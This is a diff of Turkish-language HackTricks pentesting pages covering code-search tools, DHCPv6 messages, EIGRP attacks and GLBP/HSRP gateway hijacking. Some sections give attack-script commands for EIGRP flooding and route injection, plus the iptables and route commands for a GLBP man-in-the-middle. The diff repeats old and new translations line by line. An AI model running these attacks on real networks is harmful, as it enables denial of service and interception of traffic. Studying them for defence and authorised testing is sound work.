* [**SourceGraph**](https://sourcegraph.com/search): Milyonlarca depoda arama yapın. Ücretsiz bir sürümü ve 15 günlük ücretsiz bir kurumsal sürümü bulunmaktadır. Regex'leri destekler.
* [**Github Arama**](https://github.com/search): Github üzerinde arama yapın. Regex'leri destekler.
* Belki ayrıca [**Github Kod Arama**](https://cs.github.com/)'yı da kontrol etmek faydalı olabilir.
* Belki de [**Github Kod Arama**](https://cs.github.com/) da faydalı olabilir.
* [**Gitlab Gelişmiş Arama**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab projeleri arasında arama yapın. Regex'leri destekler.
* [**SearchCode**](https://searchcode.com/): Milyonlarca projede kod arayın.
{% hint style="warning" %}
Bir depoda sızıntıları ararken ve `git log -p` gibi bir şey çalıştırırken **unutmayın ki başka sırlar içeren başka dallar olabilir**!
Bir depoda sızıntıları ararken `git log -p` gibi bir şey çalıştırdığınızda unutmayın, **diğer sırlar içeren diğer taakları olabileceğini** unutmayın!
{% endhint %}
**Try Hard Güvenlik Grubu**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** adresinden takip edin.**
* Hacking püf noktalarını paylaşarak PR'lar göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}
### DHCPv6 vs. DHCPv4 Mesaj Türleri Karşılaştırması
DHCPv6 ve DHCPv4 mesaj türlerinin karşılaştırmalı bir görünümü aşağıdaki tabloda sunulmuştur:
@ -30,17 +31,17 @@ DHCPv6 ve DHCPv4 mesaj türlerinin karşılaştırmalı bir görünümü aşağ
**DHCPv6 Mesaj Türlerinin Detaylııklaması:**
1. **Solicit (1)**: Bir DHCPv6 istemcisi tarafından mevcut sunucuları bulmak için başlatılır.
2. **Advertise (2)**: DHCP hizmeti için kullanılabilirliği belirten sunucular tarafından Solicit'e yanıt olarak gönderilir.
1. **Solicit (1)**: Kullanılabilir sunucuları bulmak için DHCPv6 istemcisi tarafından başlatılır.
2. **Advertise (2)**: Sunucular, DHCP hizmeti için uygun olduklarını belirten bir Solicit'e yanıt olarak gönderilir.
3. **Request (3)**: İstemciler, belirli bir sunucudan IP adresleri veya önekler istemek için bunu kullanır.
4. **Confirm (4)**: Bir istemci tarafından atanan adreslerin ağda hala geçerli olup olmadığını doğrulamak için kullanılır, genellikle ağ değişikliği sonrasında.
5. **Renew (5)**: İstemciler, adres ömürlerini uzatmak veya yapılandırmaları güncellemek için bunu orijinal sunucuya gönderir.
6. **Rebind (6)**: Yanıt alınamadığında özellikle bir Yenileme'ye yanıt olarak adres ömürlerini uzatmak veya yapılandırmaları güncellemek için herhangi bir sunucuya gönderilir.
4. **Confirm (4)**: İstemci tarafından atanan adreslerin ağda hala geçerli olup olmadığını doğrulamak için kullanılır, genellikle ağ değişikliğinden sonra.
5. **Renew (5)**: İstemciler, adres ömürlerini uzatmak veya yapılandırmaları güncellemek için bu mesajı orijinal sunucuya gönderir.
6. **Rebind (6)**: Yanıt alınmadığında adres ömürlerini uzatmak veya yapılandırmaları güncellemek için herhangi bir sunucuya gönderilir.
7. **Reply (7)**: Sunucular, adresler, yapılandırma parametreleri sağlamak veya Release veya Decline gibi mesajları onaylamak için bunu kullanır.
8. **Release (8)**: İstemciler, bir veya daha fazla atanan adresin kullanımını durdurmak için sunucuya bilgi verir.
8. **Release (8)**: İstemciler, bir veya daha fazla atanan adresi kullanmayı bırakmak için sunucuya bilgi verir.
9. **Decline (9)**: Atanan adreslerin ağda çakıştığını bildirmek için istemciler tarafından gönderilir.
10. **Reconfigure (10)**: Sunucular, istemcileri yeni veya güncellenmiş yapılandırmalar için işlemler başlatmaya teşvik eder.
11. **Information-Request (11)**: İstemciler, IP adresi ataması olmadan yapılandırma parametreleri istemek için bunu kullanır.
10. **Reconfigure (10)**: Sunucular, istemcileri yeni veya güncellenmiş yapılandırmalar için işlemleri başlatmaya zorlar.
11. **Information-Request (11)**: İstemciler, IP adresi ataması olmadan yapılandırma parametreleri istemek için kullanır.
12. **Relay-Forw (12)**: Röle ajanları mesajları sunuculara iletilir.
13. **Relay-Repl (13)**: Sunucular, röle ajanlarına yanıt verir, ardından mesajı istemciye iletilir.
@ -48,16 +49,17 @@ DHCPv6 ve DHCPv4 mesaj türlerinin karşılaştırmalı bir görünümü aşağ
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** adresinden takip edin.**
* Hacking püf noktalarını paylaşarak PR'lar göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,44 +1,45 @@
# EIGRP Saldırıları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**Bu,** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **adresinde sunulan saldırıların bir özetidir. Daha fazla bilgi için kontrol edin.
**Bu, [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) adresinde açıklanan saldırıların özeti. Daha fazla bilgi için kontrol edin.**
## **Sahte EIGRP Komşu Saldırısı**
## **Sahte EIGRP Komşuları Saldırısı**
- **Amaç**: EIGRP hello paketleriyle yönlendirici CPU'larınıırı yükleyerek, Olası bir Hizmet Reddi (DoS) saldırısına yol açmak.
- **Amaç**: EIGRP hello paketleri ile yönlendiricilerin CPU'larınıırı yükleyerek, Hizmet Reddi (DoS) saldırısına neden olabilecek şekilde ağır yük altına sokmak.
- **Araç**: **helloflooding.py** betiği.
- **Yürütme**:
%%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%%
- **Parametreler**:
- `--interface`: Ağ arayüzünü belirtir, örneğin `eth0`.
- `--as`: EIGRP özerk sistem numarasını tanımlar, örneğin `1`.
- `--subnet`: Alt ağ konumunu ayarlar, örneğin `10.10.100.0/24`.
- `--interface`: Ağı belirten ağ arabirimi, örn., `eth0`.
- `--as`: EIGRP özerk sistem numarasını tanımlar, örn., `1`.
- `--subnet`: Alt ağ konumunu ayarlar, örn., `10.10.100.0/24`.
## **EIGRP Kara Delik Saldırısı**
- **Amaç**: Yanlış bir rota enjekte ederek ağ trafiği akışını bozmak, trafiğin var olmayan bir hedefe yönlendirildiği bir kara delik oluşturmak.
- **Amaç**: Yanlış bir rota enjekte ederek ağ trafiğinin akışını bozmak ve trafiğin var olmayan bir hedefe yönlendirildiği bir kara delik oluşturmak.
- **Araç**: **routeinject.py** betiği.
- **Yürütme**:
%%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%%
- **Parametreler**:
- `--interface`: Saldırganın sistem arayüzünü belirtir.
- `--interface`: Saldırganın sistem arabirimini belirtir.
- `--as`: EIGRP AS numarasını tanımlar.
- `--src`: Saldırganın IP adresini ayarlar.
- `--dst`: Hedef alt ağ IP'sini ayarlar.
@ -46,41 +47,42 @@ HackTricks'i desteklemenin diğer yolları:
## **K-Değerlerini Kötüye Kullanma Saldırısı**
- **Amaç**: Değiştirilmiş K-değerleri enjekte ederek EIGRP alanında sürekli kesintiler ve yeniden bağlantılar oluşturmak, etkili bir DoS saldırısına neden olmak.
- **Amaç**: Değiştirilmiş K-değerleri enjekte ederek EIGRP etki alanında sürekli kesintiler ve yeniden bağlantılar oluşturarak etkili bir DoS saldırısına neden olmak.
- **Araç**: **relationshipnightmare.py** betiği.
- **Yürütme**:
%%%bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
%%%
- **Parametreler**:
- `--interface`: Ağ arayüzünü belirtir.
- `--interface`: Ağı belirten ağ arabirimi.
- `--as`: EIGRP AS numarasını tanımlar.
- `--src`: Geçerli bir yönlendiricinin IP adresini ayarlar.
## **Yönlendirme Tablosu Taşması Saldırısı**
- **Amaç**: Yönlendirme tablosunu çok sayıda yanlış rota ile aşırı yükleyerek yönlendiricinin CPU'sunu ve RAM'ini zorlamak.
- **Amaç**: Yönlendirme tablosunu sayısız yanlış rotayla doldurarak yönlendiricinin CPU'sunu ve RAM'ini zorlamak.
- **Araç**: **routingtableoverflow.py** betiği.
- **Yürütme**:
%%%bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%%
- **Parametreler**:
- `--interface`: Ağ arayüzünü belirtir.
- `--interface`: Ağı belirten ağ arabirimi.
- `--as`: EIGRP AS numarasını tanımlar.
- `--src`: Saldırganın IP adresini ayarlar.
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,24 +1,25 @@
# GLBP ve HSRP Saldırıları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## FHRP Kaçırma Genel Bakışı
## FHRP Kaçırma Genel Bakış
### FHRP Hakkında Bilgiler
FHRP, birden fazla yönlendiriciyi tek bir sanal birim haline getirerek ağın sağlamlığını sağlamayı amaçlayan bir protokol grubudur, böylece yük dağıtımı ve hata toleransı artırılır. Cisco Systems, bu pakette GLBP ve HSRP gibi önde gelen protokoller tanıttı.
@ -29,35 +30,35 @@ Cisco'nun oluşturduğu GLBP, TCP/IP yığınında çalışır ve iletişim içi
### GLBP İşlemleri ve Yük Dağıtımı
GLBP, tek bir sanal IP ile birleştirilmiş birden fazla sanal MAC adresi kullanarak yönlendiriciler arasında yük dağıtımını sağlayarak öne çıkar. Bir GLBP grubunda, her yönlendirici paket iletimine dahil olur. HSRP/VRRP'nin aksine, GLBP, şu mekanizmalar aracılığıyla gerçek yük dengelemesi sunar:
- **Ana Bilgisayara Bağımlı Yük Dengeleme:** Bir ana bilgisayara sürekli AVF MAC adresi atamasını korur, bu, kararlı NAT yapılandırmaları için önemlidir.
- **Round-Robin Yük Dengeleme:** Varsayılan yaklaşım, talep eden ana bilgisayarlara yönelik AVF MAC adresi atamasını sırayla değiştirir.
- **Ağırlıklı Round-Robin Yük Dengeleme:** Önceden belirlenmiş "Ağırlık" metriklerine dayalı olarak yükü dağıtır.
- **Ana Bilgisayara Bağımlı Yük Dengeleme:** Bir ana bilgisayara sürekli AVF MAC adresi atamasını sağlar, istikrarlı NAT yapılandırmaları için önemlidir.
- **Round-Robin Yük Dengeleme:** Alternatif AVF MAC adresi atama yaklaşımı, istekte bulunan ana bilgisayarlar arasında dönüşümlüdür.
- **Ağırlıklı Round-Robin Yük Dengeleme:** Önceden belirlenmiş "Ağırlık" metriklerine göre yükü dağıtır.
### GLBP'de Ana Bileşenler ve Terimler
- **AVG (Aktif Sanal Ağ Geçidi):** MAC adreslerini eş yönlendiricilere atamaktan sorumlu ana yönlendirici.
- **AVF (Aktif Sanal Yönlendirici):** Ağ trafiğini yönetmek için belirlenen bir yönlendirici.
- **GLBP Önceliği:** AVG'yi belirleyen bir metrik, varsayılan olarak 100'den başlar ve 1 ile 255 arasında değişir.
- **GLBP Ağırlığı:** Bir yönlendiricideki mevcut yükü yansıtır, manuel olarak veya Nesne İzleme aracılığıyla ayarlanabilir.
- **GLBP Önceliği:** AVG'yi belirleyen bir ölçüt, varsayılan olarak 100'den başlar ve 1 ile 255 arasında değişir.
- **GLBP Ağırlık:** Bir yönlendiricideki mevcut yükü yansıtır, manuel olarak veya Nesne İzleme aracılığıyla ayarlanabilir.
- **GLBP Sanal IP Adresi:** Bağlı tüm cihazlar için ağın varsayılan ağ geçidi olarak hizmet verir.
Etkileşimler için GLBP, ayrılmış 224.0.0.102 çoklu yayın adresini ve UDP portunu 3222 kullanır. Yönlendiriciler, 3 saniyelik aralıklarla "hello" paketleri iletimi yapar ve bir paket 10 saniyelik bir süre içinde kaçırılırsa işlevsiz kabul edilir.
Etkileşimler için GLBP, 224.0.0.102 ayrılmış çoklu yayın adresini ve UDP portunu 3222 kullanır. Yönlendiriciler, 3 saniyelik aralıklarla "hello" paketleri gönderir ve bir paket 10 saniyelik bir süre içinde kaçırılırsa işlevsiz kabul edilir.
### GLBP Saldırı Mekanizması
Bir saldırgan, en yüksek öncelik değerine (255) sahip bir GLBP paketi göndererek ana yönlendirici haline gelebilir. Bu, trafik yakalama veya yönlendirme olanağı sağlayarak DoS veya MITM saldırılarına yol açabilir.
Bir saldırgan, en yüksek öncelik değerine (255) sahip bir GLBP paketi göndererek ana yönlendirici haline gelebilir. Bu, trafik yakalama veya yönlendirme izni veren DoS veya MITM saldırılarına yol açabilir.
### Loki ile GLBP Saldırısı Gerçekleştirme
[Loki](https://github.com/raizo62/loki_on_kali), öncelik ve ağırlığı 255'e ayarlanmış bir paket enjekte ederek bir GLBP saldırısı gerçekleştirebilir. Saldırı öncesi adımlar, Wireshark gibi araçlar kullanılarak sanal IP adresi, kimlik doğrulama varlığı ve yönlendirici öncelik değerlerini toplamayı içerir.
[Loki](https://github.com/raizo62/loki_on_kali), önceden öncelik ve ağırlık değerleri 255'e ayarlanmış bir paket enjekte ederek bir GLBP saldırısı gerçekleştirebilir. Saldırı öncesi adımlar, Wireshark gibi araçlar kullanılarak sanal IP adresi, kimlik doğrulama varlığı ve yönlendirici öncelik değerlerini toplamayı içerir.
Saldırı Adımları:
1. Promiskü moduna geçin ve IP yönlendirmeyi etkinleştirin.
2. Hedef yönlendiriciyi tanımlayın ve IP'sini alın.
3. Bir İsteksiz ARP oluşturun.
3. Bir İstek Üzerine ARP oluşturun.
4. AVG'yi taklit eden kötü amaçlı bir GLBP paketi enjekte edin.
5. Saldırganın ağ arabirimine GLBP sanal IP'sini yansıtan ikincil bir IP adresi atayın.
5. Saldırganın ağ arabirimine ikincil bir IP adresi atayın ve GLBP sanal IP'yi yansıtacak şekilde yapılandırın.
6. Tam trafik görünürlüğü için SNAT uygulayın.
7. İnternet erişimini orijinal AVG yönlendiricisi üzerinden devam ettirmek için yönlendirmeyi ayarlayın.
Bu adımları takip ederek, saldırgan kendisini ağ trafiğini, şifrelenmemiş veya hassas verileri de içeren bir "orta adam" olarak konumlandırabilir ve analiz edebilir.
Bu adımları takip ederek, saldırgan kendisini ağ trafiğini, şifrelenmemiş veya hassas verileri de içeren bir "ortadaki adam" olarak konumlandırır.
Demonstrasyon için gereken komut parçaları aşağıda verilmiştir:
```bash
@ -73,25 +74,11 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
### HSRP Sızma Yöntemi Pasif Açıklaması ve Komut Detayları
### HSRP Saldırı Mekanizması
#### HSRP (Hot Standby Router/Redundancy Protocol) Genel Bakış
HSRP, ağ geçidi yedekliliği için tasarlanmış Cisco'ya ait bir protokoldür. Birden fazla fiziksel yönlendiriciyi paylaşılan bir IP adresine sahip tek bir mantıksal birim olarak yapılandırmayı sağlar. Bu mantıksal birim, trafiği yönlendirmekten sorumlu olan birincil yönlendirici tarafından yönetilir. GLBP'nin aksine, yük dengelemesi için öncelik ve ağırlık gibi metrikler kullanmaz, HSRP trafiği yönetimi için tek bir etkin yönlendiriciye dayanır.
HSRP saldırıları, En Yüksek Öncelik Değerini enjekte ederek Etkin Yönlendirici'nin rolünü zorla ele geçirmeyi içerir. Bu, Orta Adam (MITM) saldırısına yol açabilir. Temel saldırı öncesi adımlar arasında HSRP kurulumu hakkında veri toplamak bulunur, bu Wireshark kullanılarak trafiğin analiz edilmesiyle gerçekleştirilebilir.
#### HSRP'de Roller ve Terimler
- **HSRP Etkin Yönlendirici**: Trafik akışını yöneten ağ geçidi olarak hareket eden cihaz.
- **HSRP Bekleme Yönlendirici**: Etkin yönlendirici başarısız olursa devralmaya hazır yedek yönlendirici.
- **HSRP Grubu**: Tek bir dayanıklı sanal yönlendirici oluşturmak için işbirliği yapan yönlendiriciler kümesi.
- **HSRP MAC Adresi**: HSRP yapılandırmasındaki mantıksal yönlendiriciye atanmış sanal MAC adresi.
- **HSRP Sanal IP Adresi**: Bağlı cihazlar için varsayılan ağ geçidi olarak hareket eden HSRP grubunun sanal IP adresi.
#### HSRP Sürümleri
